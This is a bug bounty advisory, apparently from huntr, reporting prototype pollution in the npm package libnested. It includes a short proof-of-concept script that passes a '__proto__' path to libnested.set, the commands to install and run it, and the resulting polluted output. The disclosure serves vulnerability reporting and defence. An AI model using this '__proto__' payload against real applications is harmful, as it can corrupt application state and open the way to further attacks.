Lucene search

K
huntrReady-research1-NPM-LIBNESTED
HistoryJan 10, 2021 - 12:00 a.m.

Prototype Pollution in dominictarr/libnested

2021-01-1000:00:00
ready-research
www.huntr.dev
26
vulnerable software
proof of concept
npm
terminal command
bug bounty
security issue

EPSS

0.012

Percentile

85.8%

Description

libnested is vulnerable to Prototype Pollution.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var libnested = require("libnested")
var obj = {}
console.log("Before : " + {}.polluted);
libnested.set(obj, ['__proto__','polluted'], 'Yes! Its Polluted');
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i libnested # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted

EPSS

0.012

Percentile

85.8%